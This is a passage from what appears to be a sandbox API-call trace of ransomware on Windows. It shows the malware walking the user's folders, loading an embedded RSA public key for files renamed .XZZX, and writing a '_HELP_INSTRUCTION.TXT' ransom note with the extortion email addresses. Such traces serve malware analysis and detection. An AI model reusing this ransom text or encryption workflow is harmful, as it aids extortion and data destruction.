lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0251.821] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x13c4 [0251.821] Sleep (dwMilliseconds=0x96) [0251.976] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0251.976] lstrcmpW (lpString1="F9ECB5D32975DBFCFCC9E4D92DBFC044.XZZX", lpString2="..") returned 1 [0251.976] lstrcmpW (lpString1="F9ECB5D32975DBFCFCC9E4D92DBFC044.XZZX", lpString2=".") returned 1 [0251.977] StrStrW (lpFirst="F9ECB5D32975DBFCFCC9E4D92DBFC044.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0251.977] StrStrW (lpFirst="F9ECB5D32975DBFCFCC9E4D92DBFC044.XZZX", lpSrch="ntldr") returned 0x0 [0251.977] StrStrW (lpFirst="F9ECB5D32975DBFCFCC9E4D92DBFC044.XZZX", lpSrch="NTLDR") returned 0x0 [0251.977] StrStrW (lpFirst="F9ECB5D32975DBFCFCC9E4D92DBFC044.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0251.977] StrStrW (lpFirst="F9ECB5D32975DBFCFCC9E4D92DBFC044.XZZX", lpSrch="ntdetect.com") returned 0x0 [0251.977] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpSrch="Desktop") returned 0x0 [0251.977] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpSrch="DESKTOP") returned 0x0 [0251.977] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned 43 [0251.977] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0251.977] lstrcpyW (in: lpString1=0x17cf1c, lpString2="F9ECB5D32975DBFCFCC9E4D92DBFC044.XZZX" | out: lpString1="F9ECB5D32975DBFCFCC9E4D92DBFC044.XZZX") returned="F9ECB5D32975DBFCFCC9E4D92DBFC044.XZZX" [0251.977] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0251.977] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x13c8 [0251.977] Sleep (dwMilliseconds=0x96) [0252.132] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0252.132] lstrcmpW (lpString1="FBB049370C08D85D799956BD1029BCA5.XZZX", lpString2="..") returned 1 [0252.132] lstrcmpW (lpString1="FBB049370C08D85D799956BD1029BCA5.XZZX", lpString2=".") returned 1 [0252.133] StrStrW (lpFirst="FBB049370C08D85D799956BD1029BCA5.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0252.133] StrStrW (lpFirst="FBB049370C08D85D799956BD1029BCA5.XZZX", lpSrch="ntldr") returned 0x0 [0252.133] StrStrW (lpFirst="FBB049370C08D85D799956BD1029BCA5.XZZX", lpSrch="NTLDR") returned 0x0 [0252.133] StrStrW (lpFirst="FBB049370C08D85D799956BD1029BCA5.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0252.133] StrStrW (lpFirst="FBB049370C08D85D799956BD1029BCA5.XZZX", lpSrch="ntdetect.com") returned 0x0 [0252.133] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpSrch="Desktop") returned 0x0 [0252.133] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpSrch="DESKTOP") returned 0x0 [0252.133] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned 43 [0252.133] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0252.133] lstrcpyW (in: lpString1=0x17cf1c, lpString2="FBB049370C08D85D799956BD1029BCA5.XZZX" | out: lpString1="FBB049370C08D85D799956BD1029BCA5.XZZX") returned="FBB049370C08D85D799956BD1029BCA5.XZZX" [0252.133] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0252.133] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x13cc [0252.133] Sleep (dwMilliseconds=0x96) [0252.288] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0252.288] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2="..") returned 1 [0252.288] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2=".") returned 1 [0252.288] StrStrW (lpFirst="_HELP_INSTRUCTION.TXT", lpSrch="_HELP_INSTRUCTION.TXT") returned="_HELP_INSTRUCTION.TXT" [0252.288] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0 [0252.289] FindClose (in: hFindFile=0x3cde9d8 | out: hFindFile=0x3cde9d8) returned 1 [0252.289] FindClose (in: hFindFile=0x3cde9d8 | out: hFindFile=0x3cde9d8) returned 0 [0252.289] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures" [0252.289] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\*.*" [0252.289] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpSrch="Desktop") returned 0x0 [0252.289] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpSrch="DESKTOP") returned 0x0 [0252.289] SetErrorMode (uMode=0x1) returned 0x1 [0252.289] wsprintfW (in: param_1=0x17c4dc, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_HELP_INSTRUCTION.TXT") returned 60 [0252.289] GetUserNameW (in: lpBuffer=0x17a2b8, pcbBuffer=0x17a0a4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17a0a4) returned 1 [0252.289] wsprintfW (in: param_1=0x17a0b0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0252.289] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17a0ac | out: phkResult=0x17a0ac*=0x13d0) returned 0x0 [0252.289] RegQueryValueExW (in: hKey=0x13d0, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x43dd760, lpcbData=0x17a0a8*=0x104 | out: lpType=0x0, lpData=0x43dd760*=0x65, lpcbData=0x17a0a8*=0x4a) returned 0x0 [0252.289] RegCloseKey (hKey=0x13d0) returned 0x0 [0252.289] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17b4dc, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0252.289] wsprintfW (in: param_1=0x17a4dc, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0252.289] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13d0 [0252.289] CloseHandle (hObject=0x13d0) returned 1 [0252.289] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x3cde9d8 [0252.290] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures") returned="Pictures" [0252.290] lstrcpyW (in: lpString1=0x17c6e4, lpString2="Pictures" | out: lpString1="Pictures") returned="Pictures" [0252.290] lstrcpyW (in: lpString1=0x17e610, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz" [0252.290] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\" [0252.290] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="PrintHood" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood" [0252.290] SetErrorMode (uMode=0x1) returned 0x1 [0252.290] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood" [0252.290] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\" [0252.290] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\" [0252.290] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\*.*" [0252.290] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0xffffffff [0252.290] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0252.290] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood" [0252.290] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\*.*" [0252.290] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\", lpSrch="Desktop") returned 0x0 [0252.290] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\", lpSrch="DESKTOP") returned 0x0 [0252.290] SetErrorMode (uMode=0x1) returned 0x1 [0252.290] wsprintfW (in: param_1=0x17c4dc, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\_HELP_INSTRUCTION.TXT") returned 61 [0252.290] GetUserNameW (in: lpBuffer=0x17a2b8, pcbBuffer=0x17a0a4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17a0a4) returned 1 [0252.290] wsprintfW (in: param_1=0x17a0b0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0252.290] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17a0ac | out: phkResult=0x17a0ac*=0x13d4) returned 0x0 [0252.290] RegQueryValueExW (in: hKey=0x13d4, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x43dd990, lpcbData=0x17a0a8*=0x104 | out: lpType=0x0, lpData=0x43dd990*=0x65, lpcbData=0x17a0a8*=0x4a) returned 0x0 [0252.290] RegCloseKey (hKey=0x13d4) returned 0x0 [0252.290] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17b4dc, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0252.290] wsprintfW (in: param_1=0x17a4dc, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0252.291] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\printhood\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13d4 [0252.291] CloseHandle (hObject=0x13d4) returned 1 [0252.291] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0xffffffff [0252.291] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0252.291] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0252.291] lstrcmpW (lpString1="Recent", lpString2="..") returned 1 [0252.291] lstrcmpW (lpString1="Recent", lpString2=".") returned 1 [0252.291] lstrcpyW (in: lpString1=0x17e610, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz" [0252.291] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\" [0252.291] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="Recent" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent" [0252.291] SetErrorMode (uMode=0x1) returned 0x1 [0252.291] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent" [0252.291] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\" [0252.291] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\" [0252.291] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\*.*" [0252.291] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0xffffffff [0252.291] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0252.291] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent" [0252.291] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\*.*" [0252.291] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\", lpSrch="Desktop") returned 0x0 [0252.291] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\", lpSrch="DESKTOP") returned 0x0 [0252.291] SetErrorMode (uMode=0x1) returned 0x1 [0252.291] wsprintfW (in: param_1=0x17c4dc, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\_HELP_INSTRUCTION.TXT") returned 58 [0252.291] GetUserNameW (in: lpBuffer=0x17a2b8, pcbBuffer=0x17a0a4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17a0a4) returned 1 [0252.291] wsprintfW (in: param_1=0x17a0b0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0252.291] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17a0ac | out: phkResult=0x17a0ac*=0x13d4) returned 0x0 [0252.292] RegQueryValueExW (in: hKey=0x13d4, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x43ddbc0, lpcbData=0x17a0a8*=0x104 | out: lpType=0x0, lpData=0x43ddbc0*=0x65, lpcbData=0x17a0a8*=0x4a) returned 0x0 [0252.292] RegCloseKey (hKey=0x13d4) returned 0x0 [0252.292] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17b4dc, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0252.292] wsprintfW (in: param_1=0x17a4dc, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0252.292] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13d4 [0252.292] CloseHandle (hObject=0x13d4) returned 1 [0252.292] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0xffffffff [0252.292] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0252.292] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0252.292] lstrcmpW (lpString1="Saved Games", lpString2="..") returned 1 [0252.292] lstrcmpW (lpString1="Saved Games", lpString2=".") returned 1 [0252.292] lstrcpyW (in: lpString1=0x17e610, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz" [0252.292] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\" [0252.292] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="Saved Games" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games" [0252.292] SetErrorMode (uMode=0x1) returned 0x1 [0252.292] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games" [0252.292] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\" [0252.292] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\" [0252.292] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\*.*" [0252.292] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x3cde9d8 [0252.292] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games") returned="Saved Games" [0252.292] lstrcpyW (in: lpString1=0x17c6e4, lpString2="Saved Games" | out: lpString1="Saved Games") returned="Saved Games" [0252.292] StrStrW 